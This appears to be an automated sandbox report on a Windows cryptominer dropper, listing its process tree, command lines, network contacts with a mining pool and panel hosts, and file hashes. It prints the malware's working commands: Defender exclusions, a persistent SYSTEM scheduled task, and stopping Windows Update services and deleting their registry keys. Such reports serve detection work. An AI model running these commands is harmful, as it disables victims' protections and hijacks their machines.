PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2680 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 3816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 3816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 4572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 4572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 3488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 3488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 416 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 416 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2300 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2300 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 3724 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\choice.exe
PID 3724 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\choice.exe
PID 1504 wrote to memory of 4032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1504 wrote to memory of 4032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2640 wrote to memory of 5056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2640 wrote to memory of 5056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 592 wrote to memory of 3572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 592 wrote to memory of 3572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2640 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2640 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 592 wrote to memory of 2928 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe

"C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig/release

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

"C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig/renew

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /renew

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qzignfste#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsHost" } Else { "C:\Program Files\Windows\WindowsHost" }

C:\Windows\System32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn WindowsHost

C:\Program Files\Windows\WindowsHost

"C:\Program Files\Windows\WindowsHost"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe yadsrbyzjoct

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe hfskhxmdoncbxhsb 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

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 panel382523.site udp
N/A 31.31.198.106:80 panel382523.site tcp
N/A 52.168.112.66:443 tcp
N/A 93.184.221.240:80 tcp
N/A 65.21.237.20:43077 tcp
N/A 8.8.8.8:53 pool.hashvault.pro udp
N/A 45.76.89.70:80 pool.hashvault.pro tcp
N/A 8.8.8.8:53 panel285626.site udp
N/A 31.31.198.99:80 panel285626.site tcp
N/A 31.31.198.99:80 panel285626.site tcp

Files

memory/2204-120-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-121-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-122-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-123-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-124-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-125-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-126-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-127-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-128-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-129-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-130-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-131-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-132-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-133-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-134-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-135-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-136-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-137-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-138-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-139-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-140-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-141-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-142-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-143-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-144-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-145-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-146-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-147-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-148-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-149-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-150-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-151-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-152-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-153-0x00000000005C0000-0x00000000005C8000-memory.dmp

memory/2204-155-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-154-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-156-0x00000000052D0000-0x00000000057CE000-memory.dmp

memory/2204-157-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-158-0x0000000004E70000-0x0000000004F02000-memory.dmp

memory/2204-159-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-160-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-161-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-162-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-163-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-164-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-165-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-166-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-167-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-168-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-169-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-170-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-171-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-172-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-173-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-174-0x0000000004E10000-0x0000000004E1A000-memory.dmp

memory/2204-175-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-176-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-177-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-178-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-179-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-180-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-181-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-182-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-183-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-184-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-185-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-186-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-187-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-201-0x000000000F3B0000-0x000000000FD58000-memory.dmp

memory/2204-202-0x000000000BB50000-0x000000000BBE2000-memory.dmp

memory/2204-203-0x000000000BBE0000-0x000000000BC02000-memory.dmp

memory/2204-205-0x00000000178B0000-0x0000000017C00000-memory.dmp

memory/2268-216-0x0000000000000000-mapping.dmp

memory/4292-222-0x0000000000000000-mapping.dmp

memory/4736-239-0x0000000000000000-mapping.dmp

memory/4736-275-0x0000000004700000-0x0000000004736000-memory.dmp

memory/4736-280-0x0000000006F50000-0x0000000007578000-memory.dmp

memory/4736-299-0x00000000075C0000-0x0000000007626000-memory.dmp

memory/4736-300-0x0000000007730000-0x0000000007796000-memory.dmp

memory/4736-303-0x0000000006F20000-0x0000000006F3C000-memory.dmp

memory/4736-304-0x00000000077A0000-0x00000000077EB000-memory.dmp

memory/4736-308-0x0000000007EF0000-0x0000000007F66000-memory.dmp

memory/4736-319-0x0000000009590000-0x0000000009C08000-memory.dmp

memory/4736-320-0x0000000008CF0000-0x0000000008D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/4952-325-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/4824-329-0x0000000000000000-mapping.dmp

memory/4636-335-0x0000000000000000-mapping.dmp

memory/4952-354-0x00007FF6E53A0000-0x00007FF6E6421000-memory.dmp

memory/4712-356-0x0000000000416C9E-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd0b4ae7e3ed2099bb25465b45fcbf49
SHA1 63f95e7b6e7563045452357df06339c41d91a6d6
SHA256 58b774bb420382d9bb3016fb7f039886a8568c93c2c09c08b3b26393f580cb9a
SHA512 d380bee666a044b895a53a8e2d6e620048fbb3258473d2ce4c6f3df46abed7cf919a1714e4f8b0a35c7e62747cbd6da6f744e4b5cb35136fd67d804e298c1fe4

memory/664-389-0x0000026D31B10000-0x0000026D31B32000-memory.dmp

memory/664-399-0x0000026D32670000-0x0000026D326E6000-memory.dmp

memory/4712-398-0x0000000000400000-0x0000000000436000-memory.dmp

memory/4712-406-0x00000000054D0000-0x0000000005AD6000-memory.dmp

memory/4712-408-0x0000000004F50000-0x0000000004F62000-memory.dmp

memory/4712-423-0x0000000005080000-0x000000000518A000-memory.dmp

memory/4712-431-0x0000000004FB0000-0x0000000004FEE000-memory.dmp

memory/4712-443-0x0000000004FF0000-0x000000000503B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
